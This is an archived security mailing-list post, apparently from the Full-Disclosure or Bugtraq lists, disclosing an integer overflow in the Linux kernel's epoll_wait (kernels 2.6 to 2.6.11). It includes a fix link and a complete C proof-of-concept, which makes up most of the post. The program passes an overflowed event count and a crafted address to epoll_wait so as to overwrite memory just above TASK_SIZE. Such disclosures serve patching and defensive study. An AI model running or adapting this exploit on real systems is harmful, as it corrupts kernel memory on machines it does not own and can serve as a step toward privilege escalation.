lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
From: guninski at guninski.com (Georgi Guninski)
Subject: overwriting low kernel memory

it is possible to partially overwrite low kernel ( >= 2.6 <= 2.6.11) memory 
due to integer overflow in sys_epoll_wait and misuse of __put_user 
in ep_send_events

tested on i386.
despite the overflow, the os seemingly continues normal operation.

fix:
http://linux.bkbits.net:8080/linux-2.6/cset@...dd06a1p5PsyFhoGAJseinjEq3ew?nav=index.html|ChangeSet@-1d

-------------------------------------------------
/*
 * copyright georgi guninski.
 * cannot be used in vulnerabilities databases like securityfocus and mitre
 * */
#include <stdio.h>
#include <sys/epoll.h>
#include <sys/socket.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <stdlib.h>
#define __KERNEL__
#include <asm/processor.h>
#undef __KERNEL__

#define MAXV 500

int main(int argc,char ** argv)
{
int epfd;
int i;
int res;
struct epoll_event ev;
int *fds;
int over;
void *km;

over= ((unsigned int)-1)/sizeof(struct epoll_event)+1;
km=(void *)(TASK_SIZE - over*sizeof(struct epoll_event) - 4);
printf("sizeof=%d %x %lx\n",sizeof(struct epoll_event),over,(unsigned long)km);

        epfd = epoll_create(MAXV);
        printf("Epoll descriptor %i\n",epfd);
	fds=calloc(2*MAXV,sizeof(int));
for(i=0;i<MAXV;i++)
{	
	if (socketpair(AF_UNIX, SOCK_STREAM, 0, &fds[2*i])) perror("pair");
        ev.data.u32 = 0x42424242;
        ev.events = EPOLLOUT|EPOLLIN | 0x42424242;
        res = epoll_ctl(epfd,EPOLL_CTL_ADD,fds[2*i],&ev);
}	
for(i=0;i<MAXV;i++) write(fds[2*i+1],&i,sizeof(i));

system("sync");

        for(i = 0; i < 1; i++)
        {
                res = epoll_wait(epfd,km,over,-1);
                printf("epoll_wait returned %i\n",res);
       		printf("check what is after TASK_SIZE\n"); 
        }

        close(epfd);
	return 42;
}
----------------------------------------- 

-- 
where do you want bill gates to go today?

Powered by blists - more mailing lists